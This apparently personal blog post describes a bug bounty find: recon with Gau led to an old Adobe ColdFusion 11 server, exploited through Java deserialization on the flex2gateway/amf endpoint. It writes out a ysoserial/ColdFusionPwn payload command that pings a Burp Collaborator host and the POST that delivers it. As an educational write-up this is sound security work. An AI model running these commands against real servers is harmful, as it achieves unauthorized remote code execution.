<!DOCTYPE html>
<html lang="en-gb"><head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">Basic recon to RCE | Joshua MARTINELLE</title>
<meta property="og:title" content="Basic recon to RCE | Joshua MARTINELLE" />
<meta name="twitter:title" content="Basic recon to RCE | Joshua MARTINELLE" />
<meta itemprop="name" content="Basic recon to RCE | Joshua MARTINELLE" />
<meta name="application-name" content="Basic recon to RCE | Joshua MARTINELLE" />
<meta property="og:site_name" content="Joshua MARTINELLE" />

<meta name="description" content="Basic recon to RCE">
<meta itemprop="description" content="Basic recon to RCE" />
<meta property="og:description" content="Basic recon to RCE" />
<meta name="twitter:description" content="Basic recon to RCE" />

<meta property="og:locale" content="en-gb" />
<meta name="language" content="en-gb" />

  <link rel="alternate" hreflang="en-gb" href="http://localhost:1313/posts/2021/basic_recon_to_rce/" title="" />





    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2021-05-02T12:00:00&#43;0100 />
    <meta property="article:published_time" content=2021-05-02T12:00:00&#43;0100 />
    <meta property="og:url" content="http://localhost:1313/posts/2021/basic_recon_to_rce/" />

    

    

    <script defer type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Article",
        "headline": "Basic recon to RCE",
        "author": {
        "@type": "Person",
        "name": ""
        },
        "datePublished": "2021-05-02",
        "description": "Basic recon to RCE",
        "wordCount":  445 ,
        "mainEntityOfPage": "True",
        "dateModified": "2021-05-02",
        "image": {
        "@type": "imageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "Joshua MARTINELLE"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.145.0">

    
    <meta property="og:url" content="http://localhost:1313/posts/2021/basic_recon_to_rce/">
  <meta property="og:site_name" content="Joshua MARTINELLE">
  <meta property="og:title" content="Basic recon to RCE">
  <meta property="og:description" content="Basic recon to RCE">
  <meta property="og:locale" content="en_gb">
  <meta property="og:type" content="article">
    <meta property="article:section" content="posts">
    <meta property="article:published_time" content="2021-05-02T12:00:00+01:00">
    <meta property="article:modified_time" content="2021-05-02T12:00:00+01:00">


    
    
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="Basic recon to RCE">
  <meta name="twitter:description" content="Basic recon to RCE">


    

    <link rel="canonical" href="http://localhost:1313/posts/2021/basic_recon_to_rce/">
    <link href="/style.min.2d921c18cf1ec555ffc03d59a8adc211c402c68c930c27d6a0c306ab175a8d09.css" rel="stylesheet">
    <link href="/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/favicon.ico">




<link rel="manifest" href="http://localhost:1313/site.webmanifest">

<meta name="msapplication-config" content="/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">

    
    <link rel="icon" type="image/svg+xml" href="/icons/favicon.svg">

    
    
</head>
<body data-theme = "light" class="notransition">

<script src="/js/theme.js"></script>

<div class="navbar" role="navigation">
    <nav
        class="menu"
        aria-label="Main Navigation"
        style="
            display: flex;
            align-items: center;
            justify-content: space-between;
            width: 100%;
            padding: 0 10px;
        "
    >
        <div style="display: flex; align-items: center; gap: 10px">
            <svg viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" stroke="#000000" width="25" height="25" stroke-width="0.304"><g id="SVGRepo_bgCarrier" stroke-width="0"></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <path fill-rule="evenodd" clip-rule="evenodd" d="M15 1H1V15H15V1ZM6 5L7.41421 6.41421L5.82843 8L7.41421 9.58579L6 11L3 8L6 5ZM10 5L8.58579 6.41421L10.1716 8L8.58579 9.58579L10 11L13 8L10 5Z" fill="#ffffff"></path> </g></svg>

            <a
                href="/"
                style="font-weight: bold; text-decoration: none; color: inherit"
                >Joshua MARTINELLE</a
            >
        </div>

        <div style="display: flex; align-items: center; margin-right: 2vh">
            <a
                href="https://github.com/JoshuaMART"
                class="logo"
                style="margin-right: 12px; display: block"
            >
                <svg class="mode-sunny" viewBox="0 0 20 20" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" fill="currentColor" width="20" height="20"><g id="SVGRepo_bgCarrier" stroke-width="0"></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <title>GITHUB</title> <desc>Created with Sketch.</desc> <defs> </defs> <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"> <g id="Dribbble-Light-Preview" transform="translate(-140.000000, -7559.000000)" fill="currentColor"> <g id="icons" transform="translate(56.000000, 160.000000)"> <path d="M94,7399 C99.523,7399 104,7403.59 104,7409.253 C104,7413.782 101.138,7417.624 97.167,7418.981 C96.66,7419.082 96.48,7418.762 96.48,7418.489 C96.48,7418.151 96.492,7417.047 96.492,7415.675 C96.492,7414.719 96.172,7414.095 95.813,7413.777 C98.04,7413.523 100.38,7412.656 100.38,7408.718 C100.38,7407.598 99.992,7406.684 99.35,7405.966 C99.454,7405.707 99.797,7404.664 99.252,7403.252 C99.252,7403.252 98.414,7402.977 96.505,7404.303 C95.706,7404.076 94.85,7403.962 94,7403.958 C93.15,7403.962 92.295,7404.076 91.497,7404.303 C89.586,7402.977 88.746,7403.252 88.746,7403.252 C88.203,7404.664 88.546,7405.707 88.649,7405.966 C88.01,7406.684 87.619,7407.598 87.619,7408.718 C87.619,7412.646 89.954,7413.526 92.175,7413.785 C91.889,7414.041 91.63,7414.493 91.54,7415.156 C90.97,7415.418 89.522,7415.871 88.63,7414.304 C88.63,7414.304 88.101,7413.319 87.097,7413.247 C87.097,7413.247 86.122,7413.234 87.029,7413.87 C87.029,7413.87 87.684,7414.185 88.139,7415.37 C88.139,7415.37 88.726,7417.2 91.508,7416.58 C91.513,7417.437 91.522,7418.245 91.522,7418.489 C91.522,7418.76 91.338,7419.077 90.839,7418.982 C86.865,7417.627 84,7413.783 84,7409.253 C84,7403.59 88.478,7399 94,7399" id="github-[#142]"> </path> </g> </g> </g> </g></svg>

            </a>

            <a id="mode" href="#" style="display: block">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="20" height="20" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg> <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="20" height="20" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">Basic recon to RCE</h1>
                
                
                
                <div class="post-meta">
                    <time datetime="2021-05-02T12:00:00&#43;01:00" itemprop="datePublished"> 2 May 2021 </time>
                </div>
                
            </header>
            
            <div class="page-content">
                <p><img src="/posts/2021/basic_recon_to_rce/banner.png" alt=""></p>
<p>Recently on a BugBounty program I came across my first RCE, discovered and exploited rather quickly on a solution with a vulnerability that I don&rsquo;t master at all : Java Deserialization</p>
<h2 id="recon">Recon</h2>
<p>Currently improving my recognition tool <a href="https://github.com/JoshuaMart/AutoRecon">AutoRecon</a>, originally intended to help me with subdomain enumeration, I also want to perform some recognition tasks that are quite annoying when you have to do it many times.</p>
<p>The scope in question is like <code>*.domain.tld</code>, after enumerating subdomains, I wanted to test new tools, in this case <a href="https://github.com/lc/gau">Gau</a> which allows to retrieve URLs known through several sources. That&rsquo;s when I was asked to see a URL with the extension <code>.cfm</code>, which I don&rsquo;t know at all:</p>
<p><img src="/posts/2021/basic_recon_to_rce/RCE_GAU.png" alt="RCE_GAU"></p>
<p>A quick search will find that this extension corresponds to <code>ColdFusion Markup Language</code></p>
<p>An access on the URL actually allowed me to confirm that it is indeed the Adobe ColdFusion 11 application that is used, but the design seemed quite old &hellip; interesting.</p>
<h2 id="search-for-known-vulnerabilities">Search for known vulnerabilities</h2>
<p>A quick search on ExploitDB allowed me to find an exploit:</p>
<p><img src="/posts/2021/basic_recon_to_rce/RCE_ExploitDB.png" alt="RCE_ExploitDB"></p>
<p>Unfortunately this one wasn&rsquo;t very detailed, after several researches I found an article that details the vulnerability and its exploitation <a href="https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html">Exploiting Adobe Coldfusion</a>.</p>
<p>To make a long story short, the exploit is possible through a Java deserialization on the <code>flex2gateway/amf</code> endpoint, after verification, it was available and a GET request returned a simple blank page.</p>
<h2 id="exploitation">Exploitation</h2>
<p>According to the article, exploitation therefore requires only two things:</p>
<ul>
<li><a href="https://github.com/frohoff/ysoserial">Ysoserial</a> for Java deserialization</li>
<li><a href="https://github.com/frohoff/ysoserial">ColdFusionPWn</a> for exploitation</li>
</ul>
<p>Then we can finally create our payload, in the following example, if the poc is successful, I will receive a ping on my burp collaborator, the output of the order is recorded in the file <code>poc.ser</code> :
<code>java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'ping {your_collaborator}.burpcollaborator.net' poc.ser</code></p>
<p>So all that&rsquo;s left to do is to send it as a POST on the endpoint <code>flex2gateway/amf</code> :</p>
<p><code>http post https://xyz.domain.tld/flex2gateway/amf Content-Type:application/x-amf &lt; poc.ser</code></p>
<p>And then I got the ping on my burp collaborator:</p>
<p><img src="/posts/2021/basic_recon_to_rce/RCE_PoC.png" alt="RCE_PoC"></p>
<h2 id="conclusion">Conclusion</h2>
<p>This is my first RCE found on a private program, really interesting because it exploits a known vulnerability with known exploits, but rather than launching the first exploit I could get my hands on, I preferred to document myself and look for something that would give me the impression to have a better mastery of the exploit even if it was wasting my time.</p>
<p>In fact, I discovered the vulnerability late one night, before exploiting it only the next day because I didn&rsquo;t want to do anything harmful since it&rsquo;s production.</p>
<p>Nevertheless, <a href="https://github.com/lc/gau">Gau</a> is really a must-have and if you don&rsquo;t count the time spent reading / understanding the vulnerability, the research and exploitation took me less than 30min.</p>

            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
</div>
    <small class="footer_copyright">
        © 2025 .
        Powered by <a href="https://github.com/hugo-sid/hugo-blog-awesome" target="_blank" rel="noopener">Hugo blog awesome</a>.
    </small>
</footer><a href="#" title="Go to top" id="totop">
    <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="currentColor" stroke="currentColor" viewBox="0 96 960 960">
    <path d="M283 704.739 234.261 656 480 410.261 725.739 656 677 704.739l-197-197-197 197Z"/>
</svg>

</a>


    






    
    <script async src="http://localhost:1313/js/main.js" ></script>

    

</body>
</html>
